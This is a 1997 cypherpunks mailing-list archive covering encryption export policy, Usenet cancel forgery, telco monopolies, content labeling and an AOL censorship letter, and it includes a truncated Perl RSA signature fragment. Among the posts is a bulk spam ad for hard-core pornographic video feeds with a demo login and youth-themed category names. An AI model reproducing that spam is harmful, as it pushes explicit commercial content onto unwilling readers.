Work towards the principle that free markets are more efficient than
state monopolies.

> > Here's a reading list for those interested in disbanding government
> > and replacing it with services purchased on the free market:
> [...]
> 
> Hmm.  You base your philosophy on a couple of science fiction novels,
> "The Machinery of Freedom", Adam Smith, and Hayek? Some years ago I
> read Nozick and Rand, because I thought there might be something to
> libertarian philosophy.  I also read parts of "Machinery of Freedom"
> -- a better title, I think, would be "Intellectual Tinkertoys of
> Freedom" -- and something by Boas, and a couple other things that fade
> from my memory.  I conclude that these books are libertarian
> scripture, and function like that physicists bible.  

Adam Smith is a pretty sound pure market economics text.  If you can
refute any of it's claims, which are in the main logical, or
mathematical readily observable truisms, I'd be interested to hear
your arguments.

Hayek just points out the clearly observable trends with Socialism.
If you can't see much of what he was saying back in 1944 replayed
before your eyes in the US, you've got your eyes closed.

Rand is a somewhere between the two, lots of negative things to say
about socialism, and also lots to say about free market.

> Adam, I admire your conviction, I respect your technical expertise a
> lot, but we have a different view of reality.  We will just have to
> differ on that. 

Heh, I said I wouldn't convince you.

[I took the perl rsa usage to a new post]

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 31 Jul 1997, Dr.Dimitri Vulis KOTM wrote:

> ? the Platypus {aka David Formosa}  writes:
> 
> > Nno one is arugeing that.  Both sides in this debait aggry that that is a
> > REAL BAD thing.  Spam cancelers use an objective rules.

[...]

> Let me clarify two things:
> 
> 1. "Spam cancellers" are not generally news admins.

I think you will have to justerfy this,  the top spam cancellers are all
news adimns.

> 2. Once a cancel-forger builds a "reputation" as a "spam canceller",
> s/he often diversifies into "retromodetration"

There is little proof that this is the case.  Even the netscum case could
have been considered spam.

[...]

> > Not even forgeries in my name?  Not even out of the control spews from
> > fidonet?
> 
> Correct.

Ok so if a mailing list gateway @bwalk.dm.com pumps thousands of broken
posts into usenet you don't wish them to be removed from usenet?

Nor if I post a message with your name and email, saying "Chris Lewis the
best thing that happened to usenet and I wish to have his baby."

If this is so sould I change the RB to reflect this.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+GTWKQK0ynCmdStAQERNQP+OlKyKfBQl0YOb3hBRipLXHfvnLSdhnWY
HF91PySz5wikYaF046efV+SeIN7+cMPj8+LPdYMvft8Wy/gQMU6Sjp8hVFz4l5kN
4ygAihiDmHXWsDbvpksiSuJBodvvE/EnSqrulpEYfJ2KNb33dCDfuoo8ARk5DZhD
+5l3c9SPDek=
=50wo
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Fri Aug  1 05:29:02 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Fri, 1 Aug 1997 20:29:02 +0800
Subject: Rep. White introduces Internet Protection Act
In-Reply-To: <199707311411.HAA18283@toad.com>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 31 Jul 1997, Peter Trei wrote:

[...]

> Does the FCC charter mention photonic communications as 
> well?

Well snice the FCC IIRC has authourty over radio wich has a (minor)
photonic componte it has always been so.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+GVcaQK0ynCmdStAQHNFAQAlWsW/FWHXQt5O++uSZ5DaO3r9j+b043Q
FS2CN6xd6BPyGViz1sV3oH1u4hXa+nl8rSMRlV0+jLA443XAAaGDToezhmhgkPrn
mFuQKGbeZBApVj7CB8hWraZvNexQwljstjfnkn+Qpm+NYcvEPk+e4J7OcXKKXZEX
2SD1p5Vw/5A=
=Xfc9
-----END PGP SIGNATURE-----






From apache at bear.apana.org.au  Fri Aug  1 05:58:41 1997
From: apache at bear.apana.org.au (Apache)
Date: Fri, 1 Aug 1997 20:58:41 +0800
Subject: "Telco Terrorism" -- Wired on Baby Bells v. the Net
In-Reply-To: <199708010535.HAA23978@basement.replay.com>
Message-ID: <199708011218.WAA00840@bear.apana.org.au>



   Anonymous said:


>   If the telcos don't want to use efficient, effective technology
>to render service to their customers, then I certainly wouldn't
>want to *force* them to do so. However, neither do I want to be
>*forced* to pay exhorbitant rates because the telecos want to
>maintain a sloppily run monopoly on the services I have to choose
>from.

When satellite dish receive/broadcast services become common watch the 
scramble by telcos to update and offer cheap high speed links. Of course 
by then a lot of folks will just say fuck them. Here for your amusement 
are some sample prices offered by our very own blood sucking Telstra 
leech in our very own monopoly/oligopoly market (hard to say exactly what 
it is but there's no effective competition due to decades of government 
monopoly status:

All figures in Australian play money
====================================
Qoute from Toll$tra's web page: "Depending on your access speed, there is 
a low cost, flat monthly pricing for permanent modems or a two-tier price 
structure based on ussage for dedicated access ports pf 64 kbps and 
above."

Then if you dig and I do mean *dig* around on Toll$tra's web page you 
will eventually come across the actual pricing data if your lucky 
(depending on how you look at it).

Well now I just went to their web site and behold; in their wisdom and in 
their position as a internet provider they have removed(!) the pricing 
information on the page. You now have to ring them (I just tried..no 
answer) or email them (tried that 4 hours ago no reply so far) so I'll 
just post from memory. These figures will be wrong but they give some 
idea:

Permanent modem 33.6 connection: about $400 per month (plus call costs)
ISDN 64k: about $1000 per month plus 19 cents/Mb for data received over 
about 25 percent usage
ISDN 128k: about $2000 per month plus usage as above
DDS/FRAME relay: Astronomical $$$$$$$$ per month plus usage per above.
Establishment fee for the above: $1000 - $2000
Upgrade fee from to a new level: Same as establishment fee

I note with great interest an independent provider in New Zealand which
has a better competitive market situation in this area than Australia
(and a lot of other things I might add) offers a user account with up to
500kbs satellite feed for $79 (NZ) /mnth flat plus installation of $79 
plus you must by the satellite dish ($699). I would assume you can't 
resell bandwidth on this set up so the two are not directly comparable.

Oh yes and back to the topic, Telstra here trot out the same garbage as 
in the original post trying to justify timed local calls every year or 
so. Thus far they have been beaten...but only just. Technical solutions 
and a free market will be the only long term solutions, as we would 
expect.

-- 
   .////.   .//    Charles Senescall             apache at bear.apana.org.au
 o:::::::::///                                   apache at quux.apana.org.au
>::::::::::\\\     Finger me for PGP PUBKEY            Brisbane AUSTRALIA
   '\\\\\'   \\    Apache







From fnorky at geocities.com  Fri Aug  1 06:49:11 1997
From: fnorky at geocities.com (Doug Peterson)
Date: Fri, 1 Aug 1997 21:49:11 +0800
Subject: Yet another self-labeling system (do you remember -L18?)
In-Reply-To: <199707311540.RAA01345@basement.replay.com>
Message-ID: <33E1E37A.765@geocities.com>



Anonymous wrote:
> 
> James Love wrote:
> 
> >    On your other point, I really don't agree that is morally wrong to
> >take steps to prevent children from having access to pornography.
> >People may propose ways of doing this which are objectionable, but the
> >basic goal is hardly immoral.  Indeed, many think it is immoral not to
> >protect children.
> 
> Yes, yes...one man's morality is another's immorality.  Each of them thinks
> of himself as "being in the right" and sees the others as wrong or even
> "evil"  (witness the anti-BoyLover zealotry).  Different subjects but the
> same bullshit.  See the futility of it yet, Jamie?

Agreed.  Every religion and culture has a different set of standards and
values that it's people use to judge others by.  We will always piss off
someone.
 
> If parents find pornography objectionable for their children, then they
> must take ultimate responsibility to keep pornography away from their kids.
>  If they are not willing to do this, then they should not have had the
> children in the first place.  It's up to them to take care of their kids.
> Not you, not me, not the government, and not some "voluntary" ratings
> system.

I don't think I have seen this said better anywhere.

-Doug






From declan at well.com  Fri Aug  1 07:30:28 1997
From: declan at well.com (Declan McCullagh)
Date: Fri, 1 Aug 1997 22:30:28 +0800
Subject: Letter to AOL on "proposed censorship summit with radical right" (fwd)
Message-ID: 





---------- Forwarded message ----------
Date: Fri, 1 Aug 1997 07:16:14 -0700 (PDT)
From: Declan McCullagh 
To: fight-censorship at vorlon.mit.edu
Subject: Letter to AOL on "proposed censorship summit with radical right"



---------- Forwarded message ----------
Date: Fri, 1 Aug 1997 10:09:12 -0400 (EDT)
From: WildcatPrs at aol.com
To: declanmccullagh 
Subject: Fwd: Your Proposed Censorship Summit with Radical Right Leaders

---------------------
Forwarded message:
Subj:    Your Proposed Censorship Summit with Radical Right Leaders
Date:    97-07-31 11:43:06 EDT
From:    WildcatPrs
To:      Steve Case

Dear Steve Case,

As one of the plaintiffs in the ACLU/ALA case on the CDA, who saw it through
all the way to the Supreme Court, I am shocked and dismayed that you would
dignify the demands of the Christian Coalition et al by sitting down with
them in such a summit.

You know and I know that America Online will leave that negotiating table
having made major concessions on the subject of Internet censorship -- not
only for content on gay and lesbian and AIDS, but also women's issues and
many other subjects.   The religious right have a very long list of subjects
that they would like to censor out of U.S. libraries, schools and
media...which you will discover if you take the trouble to read BANNED BOOKS,
published each year by the ALA.

Get a clue, Mr. Case  This battle over "content" is not really about "child
pornography."  It is a thinly veiled disguise for the radical right's efforts
to impose its total belief and its proposed penal system on the people of the
United States.  It wants to have the United States be like the Colony of
Massachusetts before the Revolution.  I suggest you read some history, and
ponder whether you would have liked living under the religious dictatorship
that ran the colony.

Between 1962 and 1972, I lived in Spain as a working journalist for the
Reader's Digest, working out of its office in Madrid, and I saw in operation
just the kind of right-wing censorship system that the Christian Coalition et
al would like to impose on this country.  Part of its success involved just
the kind of "self-censorship" that you are now proposing to slap on your own
company.  You are no different than the Spanish book publishers who sat down
with the Catholic Church and agreed on what could be published.   As a
result, Spanish culture languished.  The Spanish people reached the point
where they had lots of jokes about self-censorship and didn't take their own
media or culture seriously.   It all came to an end in 1975, when Franco
died, and the Spanish people were so sick of church and censors that the new
government moved to end the hegemony of the Spanish Catholic Church and put
an end to censorship.

So shame on you for moving to introduce this kind of censorship to the United
States of America.   I have been a loyal customer of AOL since I got onto the
Internet two years ago, and I will take my business elsewhere if you go
through with this summit.

Sincerely,
Patricia Nell Warren

Wildcat Press
8306 Wilshire Blvd. Box 8306
Beverly Hills, CA 90211
213/966-2466
213/966-2467 fax








From dlv at bwalk.dm.com  Fri Aug  1 07:37:56 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 1 Aug 1997 22:37:56 +0800
Subject: Attila T. Spammer / Re: Denning questions/reverses her position?
In-Reply-To: <199708010531.HAA23603@basement.replay.com>
Message-ID: <9seRae2w165w@bwalk.dm.com>



nobody at REPLAY.COM (Anonymous) writes:

> Attila T. Hun wrote:
> >     I'm too old for this!  I never thought I would see the day that
> >     Dorothy Denning would terminate her star role as a shill for the
> >     Clinton/LEA encryption ban!
>
>   As a matter of fact, the mere thought of this happening has caused
> Attila to go into a state of "brain-lock" wherein he sits at his
> keyboard, sending the same message, over and over again, to the list.
>   It will be interesting to see what happens to Attila's brain if
> Clinton ever vetos a bill because it subverts the Constitution.

A mail glitch.  Big deal.  :-)

>   BTW, Dorothy Denning's new spokesperson is a flying pig, and the
> Weather Network reports that Hell froze over shortly before Denning's
> new position statement.


Come on now.  Dr. Denning is a VERY smart woman and I'm glad that she
eventually came to see the evils of GAK (key escrow by gov't).

I'm pretty sure she still supports the right of a corporation to
tell the users of corporate systems not to have anything on those
systems that the corporation can't decrypt.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Fri Aug  1 07:39:00 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 1 Aug 1997 22:39:00 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free   download)
In-Reply-To: 
Message-ID: <41eRae3w165w@bwalk.dm.com>



? the Platypus {aka David Formosa}  writes:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> On Thu, 31 Jul 1997, Bill Stewart wrote:
>
> [...MMF...]
>
> > though I'm sure that to some extent it's because people started
> > complaining to the Post Office that they were receiving junk mail,
>
> The MMF ban came about when its volume rose to a point where it crashed
> californaia's snail mail system.

Not true.  Urban legend.

(Not did the Cantor & Siegel spam cut Australia off of Usenet.  The cancels
forged for their spam did.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From sunder at brainlink.com  Fri Aug  1 07:48:39 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Fri, 1 Aug 1997 22:48:39 +0800
Subject: OverRun Msgs Re: Denning questions/reverses her position?
In-Reply-To: <199708010622.AAA19605@infowest.com>
Message-ID: 




Sounds like Dorothy's Revenge to me.  (i.e. a case of the email shits. :)
Heheh. :)

On Fri, 1 Aug 1997, Attila T. Hun wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> on or about 970731:2245 it was expostulated:
> 
> +::
> +Anon-To: cypherpunks at toad.com
> 
> +Attila T. Hun wrote: 
> +>     I'm too old for this!  I never thought I would see the day that
> +>     Dorothy Denning would terminate her star role as a shill for the
> +>     Clinton/LEA encryption ban!
> 
> +  As a matter of fact, the mere thought of this happening has caused
> +Attila to go into a state of "brain-lock" wherein he sits at his
> +keyboard, sending the same message, over and over again, to the list.
> +  It will be interesting to see what happens to Attila's brain if
> +Clinton ever vetos a bill because it subverts the Constitution.
> 
> +  BTW, Dorothy Denning's new spokesperson is a flying pig, and the
> +Weather Network reports that Hell froze over shortly before Denning's
> +new position statement.
> 
> +TruthMonger
> 
>     dunno why the message was repeated at cyberpass --each of the 55
>     copies I received as of 20 minutes ago has exactly the same header
>     date from cyberpass.  that and one of them smoked the primary
>     mailbox with a couple hundred null characters.  hun.attila.org
>     was offline so it could not have generated the extra messages --so
>     where did they loop?  only the shadow knows. If it is something
>     by remote SMPT added on, I apologize for the inconvenience.
> 
>     the image of my brain in "brain-lock" is apt enough for the reaction;
>     as for the flying pig and Hell freezes over --that too. Denning is
>     still Denning, and maybe she's just angling for more shill money 
>     before she gets back on the track.
> 
>     yes, if Clinton ever vetos a bill just because it violats the 
>     Constitution, I probably would be gone....


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From ravage at ssz.com  Fri Aug  1 08:40:28 1997
From: ravage at ssz.com (Jim Choate)
Date: Fri, 1 Aug 1997 23:40:28 +0800
Subject: Attila T. Spammer / Re: Denning questions/reverses her position? (fwd)
Message-ID: <199708011527.KAA26326@einstein.ssz.com>



Forwarded message:

> Subject: Re: Attila T. Spammer / Re: Denning questions/reverses her position?
> From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Fri, 01 Aug 97 09:18:19 EDT

> I'm pretty sure she still supports the right of a corporation to
> tell the users of corporate systems not to have anything on those
> systems that the corporation can't decrypt.

And why wouldn't you? Let's look at this a moment.

1.   Business, irrespective of size, is not equivalent to the government
     and specificaly isn't mentioned in the Constitution at all so we
     are reasonably safe they are exempt from federal compliance with its
     requirements outside that detailed for citizens and regarding
     inter-state or international trade.

2.   The relationship between employer and employee is one based on a
     contract.

3.   Neither party is forced beyond their own needs and desires to sign
     the contract.

4.   Each party is aware of the contents of the contract before they
     sign it, or at least is given the opportunity to be made aware.
     If somebody wants to sign a contract with no knowledge of its
     contents, so be it.

5.   Who owns the computers? The business does clearly. Now a commen
     proviso on ownership is that the final decision, or the transfer
     of that decision, is up to the business. Just as it is ultimately
     up to you who gets to drive your car.

6.   Most provisions of employment contain the proviso that the time
     you agree to work for that employer is to be spent on dealing with
     the employers needs and not the employees. This is after all at least
     one of the reasons behind using time off and floating holidays and
     such.

7.   Provided the employee is aware of this policy at the time of
     signing OR is given a reasonable warning period before a shift of
     policy after hiring then the employee has no grounds to complain.


Myself, I always ask my immediate supervisor for a description of company
policy on this. I also always ask if they have an objection to me using
the company system to log into my home system during lunch and other
'off-clock' hours. So far I have never been refused.

Short answer to this, use your own resources for your own use and don't
use other peoples resources to carry on your own activities unless you offer
them a cut of the profit.

Ultimately this isn't even a question of contracts but of simple plain ol'
every-day manners.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From cavery at ccnet.com  Fri Aug  1 08:48:46 1997
From: cavery at ccnet.com (Chris Avery)
Date: Fri, 1 Aug 1997 23:48:46 +0800
Subject: One effort for Internet Privacy
Message-ID: <01BC9E55.F7C62CE0@h97-128.ccnet.com>



On a lark, I dashed off a "letter to the editor" of the San Francisco Chronicle, quoted below, lo and behold it got published today.  You will see I simplified and softened the message somewhat -- a little spin for the good guys never hurt:  (published as lead letter, nice headline)

"HOW FAR SHALL WE LET THE EAVESDROPPERS GO?"

Editor -- Washington wants the right to "wire-tap" private communications on the Internet, and the issue is now being debated in Congress. I'm not raising the "content" issue, which can be handled by screening software or by ratings; this is instead the issue of privacy in person-to-person communications.

The rationale for the bills before Congress is law enforcement, giving officials new methods to detect criminal activity.  All well and good, but is it really wise to grant the bureaucracy access into this vital channel of personal communications before we fully understand its potentials?  How far shall we let the eavesdroppers go?  Beware, these aren't casual issues --- your rights are in danger.

CHRIS AVERY
Oakland






From promotions at web-promotions.com  Sat Aug  2 00:42:24 1997
From: promotions at web-promotions.com (promotions at web-promotions.com)
Date: Sat, 2 Aug 1997 00:42:24 -0700 (PDT)
Subject: Fraud Control
Message-ID: <199708020404.AAA06976@loki.atcon.com>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message has been sent by Web-Promotions.Com  and adheres to all North American laws pertaining to Bulk Email.

If you would like to be removed from future mailings please respond back to the sending address
and put REMOVE in the SUBJECT BOX. Placing the word remove in any other area of the email may go unnoticed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


-----------------ALERT TO ALL WEB MASTERS---------------
Are you the victim of fraud?
You may be being lied to by so called Live Video Feeds.
Get what you paid for.  100% live video feeds.  Not 12 hours live, 24 hours
live all the time. Get Itslive feeds.  They are LIVE LIVE LIVE!!!

Samples at:

http://www.linkitslive.com/candy

user:	live
pass:	demo

Itslive offers more live 24 hour feeds than anyone else on the planet.  But
it does not stop there.  We have hard core digital feeds too.

Check out these new summer prices for unlimited feeds for your site.

$400 Hard Core feed (Asian, Young, Lesbian, Anal, Oral, Inter racial, and Gay)

$450 Digitized Itslive feed

$950 24 hour Live Itslive feed

Hundreds of packages available, see why top sites like Net babes, Pink
Bits, and Webs Youngest Women use Itslive as their one stop Video Shop.

---------NEW***NEW***NEW---------

Personalize your site with our Sweetheart Program

http://www.linkitslive.com/sweetheart

To sign up or ask any questions mailto:Candy at Itslive.com

Candy Roberts
Itslive Direct Sales
3i Inc
800-555-8852 or 214-658-1520
Fax 214-658-1507
Candy at Itslive.com






~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message has been sent by Web-Promotions.Com  and adheres to all North American laws pertaining to Bulk Email.

If you would like to be removed from future mailings please respond back to the sending address
and put REMOVE in the SUBJECT BOX. Placing the word remove in any other area of the email may go unnoticed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From sameer at c2.net  Fri Aug  1 11:30:06 1997
From: sameer at c2.net (sameer)
Date: Sat, 2 Aug 1997 02:30:06 +0800
Subject: Microsoft RAS encryption?
In-Reply-To: <3.0.3.32.19970801101506.0092b420@localhost>
Message-ID: <199708011755.KAA11466@gabber.c2.net>



	See www.l0pht.com


> 
> Does anybody know how Microsoft RAS implements data encryption? Apparently
> (http://www.microsoft.com/kb/articles/q136/6/34.htm) they use RC4, but is
> this stuff documented somewhere, like in an RFC?
> 
> 
> Mike.
> 


-- 
Sameer Parekh					Voice:   510-986-8770
President					FAX:     510-986-8777
C2Net
http://www.c2.net/				sameer at c2.net






From nospam-seesignature at ceddec.com  Fri Aug  1 16:21:15 1997
From: nospam-seesignature at ceddec.com (nospam-seesignature at ceddec.com)
Date: Sat, 2 Aug 1997 07:21:15 +0800
Subject: "Telco Terrorism" -- Wired on Baby Bells v. the Net
In-Reply-To: 
Message-ID: <97Aug1.163354edt.32258@brickwall.ceddec.com>



My ISP has already tried 128K wireless spread spectrum radio modems, and
they work fairly well.

If the Telcos move to raise rates, the internet will cease using the Telco
system.  And then some telephone interface company will create an internet
to POTS (Paleo Obsolete Telephone Service) interface.

The problem as it was explained to me is the aggregation factor (I don't
remember all the details so the following information is from my bad
memory).  Back when, someone decided that 8 lines could be grouped, and 8
groups would form a trunk (or at some level), so any of 64 stations could
make 8 (or 16) phone calls simultaneously into the central office.  Really
bad things happen when the 8 people are on for several hours and a 9th
attempts to use it.  To the point where you can't get a dialtone.  And
redial.  Which uses more CO resources.  Which causes more people not to
get a quick dialtone.  Which causes them to redial too...  And then it
melts down.  (The time it takes to get dialtone is apparently a measure of
load on the system).

Telcos are like modern Banks - they are based on fractional reserve
bandwidth.  When everyone tries to use their share at the same time, you
have the equivalent of a run on a bank.

Didn't Adam Back suggest bandwidth based financial derivatives...

--- reply to tzeruch - at - ceddec - dot - com ---








From ir at dev.null  Fri Aug  1 16:21:38 1997
From: ir at dev.null (Intolerant Remailer)
Date: Sat, 2 Aug 1997 07:21:38 +0800
Subject: New Remailer Announcement
Message-ID: <199708012152.PAA09058@wombat.sk.sympatico.ca>



   ----x------------------x----x------x---------------------x-x-----
   ANNOUNCEMENT: The "Intolerant Remailer" is now fully operational!
   ----x------------------x----x------x---------------------x-x-----

Remailer Policy
---------------
  Read the header, you lazy bastard.

Remailer Help
-------------
  You won't need any. Read the fucking header, like I told you!

Remailer Stats
--------------
  Why do you want to know? Are you a cop, or something?

Remailer Abuse Policy
---------------------
  Fuck you!

For Further Information:
-----------------------
  Don't bother asking. As a matter of fact, I've come to the decision
that I don't want a bunch of assholes like you using my remailer. Get
your own goddamn remailer!

----x------------------x----x------x---------------------x-x-----------
"Intolerant Remailer" is a registered TradeMark of "Automated Anonymous 
Assholes, Inc.", for use only by the "Electronic Forgery Foundation."
----x------------------x----x------x---------------------x-x-----------






From jamesd at echeque.com  Fri Aug  1 16:51:58 1997
From: jamesd at echeque.com (James A. Donald)
Date: Sat, 2 Aug 1997 07:51:58 +0800
Subject: FCPUNX:'Telco Terrorism' -- Wired on Baby Bells v. the Net
Message-ID: <199708012338.QAA24304@proxy4.ba.best.com>



At 10:18 PM 8/1/97 +1000, Apache wrote:
> I note with great interest an independent provider in New Zealand which
> has a better competitive market situation in this area than Australia
> (and a lot of other things I might add) offers a user account with up to
> 500kbs satellite feed for $79 (NZ) /mnth flat plus installation of $79 
> plus you must by the satellite dish ($699). I would assume you can't 
> resell bandwidth on this set up so the two are not directly comparable.

The (comparatively) free market telecom system in New Zealand is due
to a LEFT WING, pro liberty, government, that adopted a strategy 
"let us privatize first and let the free market sort out the chaos 
later"

The equivalent in America is almost unimaginable.  Here in America left
means statist, left means big brother is in charge.  The same is true,
or used to be true when I was there, in Australia, though not to the
extreme that it is true in America.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From gelmanl at gwis2.circ.gwu.edu  Fri Aug  1 17:11:51 1997
From: gelmanl at gwis2.circ.gwu.edu (Lauren Amy Gelman)
Date: Sat, 2 Aug 1997 08:11:51 +0800
Subject: reuters crypto story (fwd)
Message-ID: 







----------------------------------------------------------------------------
----------------------------------------------------------------------------
Lauren Amy Gelman, USACM			gelman at acm.org
U.S. Public Policy Committee for the Association for Computing

---------- Forwarded message ----------
Date: Fri, 01 Aug 1997 16:24:40 -0400
From: Aaron Pressman 
Subject: reuters crypto story


Human rights groups favor strong encryption abroad
  WASHINGTON, Aug 1 (Reuter) - Human rights activists came to Capitol Hill
on Friday to tell lawmakers of their need to use strong computer encoding
programs, subject to strict U.S. export limits, in their work outside the
country.
   The debate over exports of encryption technology, which scrambles
information and renders it unreadable without a password or software "key,"
 has largely pitted the interests of commercial companies and civil
libertarians against those of law enforcement and intelligence agencies.
   But human rights advocates said Friday they also had a critical interest
 at stake.
   Swift and inexpensive communications over the Internet "promise to
destroy the ability of abusive regimes to silence their people, hide their
atrocities and blockade the truth," said Dinah PoKempner, deputy general
counsel for Human Rights Watch.
   "Encryption offers the most fundamental protection to those who seek to
bring abuses to light in these circumstances," she added at a briefing for
congressional staff.
   Those who report human rights abuses can become victims of abuse if
discovered, so the availability of encryption to hide electronic mail
messages or faxes can be a matter of "life or death," said Patrick Ball,
who trains human rights activists to use the technology.
   The Clinton administration generally prohibits the export of strong
encryption unless the products allow the government to decode any message
by gaining access to the software keys. A variety of encryption-related
legislation is pending in Congress, including bills that would overturn the
 Clinton policy and relax the export limits.
   Ball, senior program associate with the American Association for the
Advancement of Science (AAAS), warned that the use of so-called key
recovery features to give governments access to coded messages could
compromise the work of human rights groups.
   "How can we ensure that intelligence and law enforcement groups in
repressive countries will not directly or indirectly obtain human rights
groups keys from the U.S. government," Ball asked. "Human rights monitoring
 is always defined by repressive regimes as a threat to national security."
   Congressional staffers attending the briefing also heard from leading
cryptography scientists who said U.S. export controls stifled research on
encryption, thereby slowing the development of more secure computer
networks.
   Alex Fowler, project coordinator with the AAAS, said the presentations
were intended to counter the portrait of encryption users painted by law
enforcement agencies.
   "We want to reaffirm that cryptography is a science, not just a pastime
of anarchists, terrorists and hackers," Fowler said.
   The export rules prohibit U.S. researchers from collaborating with
foreign scientists on coding technology, according to Ian Goldberg, a
graduate student at the University of California.
   In January, Goldberg sucessfully cracked a message in a few hours that
had been encoded with the most powerful encryption allowed to be freely
exported from the United States.
   A Canadian citizen, Goldberg said that he could collaborate with others
or publish research on the Internet while home from school. "But I can't go
 home every time I have an idea --the plane fare alone..." he joked.
   --Aaron Pressman((202-898-8312))

For related news, double click on one of the following codes:
[E] [U] [MNI] [NAT] [CAN] [US] [WASH] [BUS] [TEL] [DPR] [TRD] [ENT] [MUNI]
[GVD] [DBT] [INT] [FRX] [CA] [LEN] [RTRS]

Friday, 1 August 1997 16:04:06
RTRS [nN01204006]


------------------------------------------------------------------------
Any views expressed in this message are those of the individual  sender,
except  where  the  sender  specifically  states them to be the views of
Reuters Ltd.






From dlv at bwalk.dm.com  Sat Aug  2 08:20:29 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 08:20:29 -0700 (PDT)
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: 
Message-ID: 


? the Platypus {aka David Formosa}  writes:

> On Thu, 31 Jul 1997, Adam Back wrote:
>

[detect multi-post]
> > That is cancel all but one groups worth of articles, and then modify
> > the Newsgroups line to cross-post to all the groups the article was
> > originally posted to.
>
> No that is worce,  it would be forgery of the orginal post.  In addtion it
> would violate the usenet requirement to avoid modifing the post.

In my opinion, the hnorable way to deal with multi-posts is to detect them
automatically and to ignore them. A NoCeM 'bot like the one run by the
Venerable CancelMoose is a good thing.

A compression scheme where many copies of the same text would be transmitted
only once even if they're posted once would be an excellent thing (given that
such traffic is a very substantial
portion of a full uncensored feed), but it's not crucial.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From dlv at bwalk.dm.com  Sat Aug  2 08:21:08 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 08:21:08 -0700 (PDT)
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: <19970731090412.58654@math.uiuc.edu>
Message-ID: <6PBTae5w165w@bwalk.dm.com>


Tim Skirvin  writes:

> Adam Back  writes:
>
> > Newsadmins who auto-cancel cross-posts are acting counter-productively
> > and censorously.

Once again, the net.Scum who forges cancels are generally NOT news admins.

Please examine Net.Scum web pages for the self-appointed censors like
Tim Brown (http://www.netscum.net/brownt0.html) or Bob Curtis
(../curtisb0.html) when the site is up again.  Indeed, Bob Curtis's
example is very telling - he tried to "take over" an unmoderated
newsgroup, claiming to represent some "Usenet administration", and
forging cancels for articles that exposed his lies.

> 	I'm not aware of anybody that does that.  The only crossposts that
> are killed are those that reach a BI of 20, and for a single post to do
> that would require the message to be crossposted to 400 newsgroups.  Which
> doesn't happen.

Here's one counterexample. Yes, it's in the
regional relcom.* hierarchy.  Yes, there are lots of folks who forge cancels
for "inappropriate cross-posts" in the "big 8". I won't bother looking
for them because Tim Skirvin knows about it and is simply lying.

]Path: ...!www.nntp.primenet.com!globalcenter1!news.primenet.com!nntp.primenet.com!howland.erols.net!europa.clark.net!newsfeed.sovam.com!sovam!Gamma.RU!srcc!news1.relcom.ru!news1.relcom.ru!dmart
]From: dmart at news1.relcom.ru (Dmitri Martynoff)
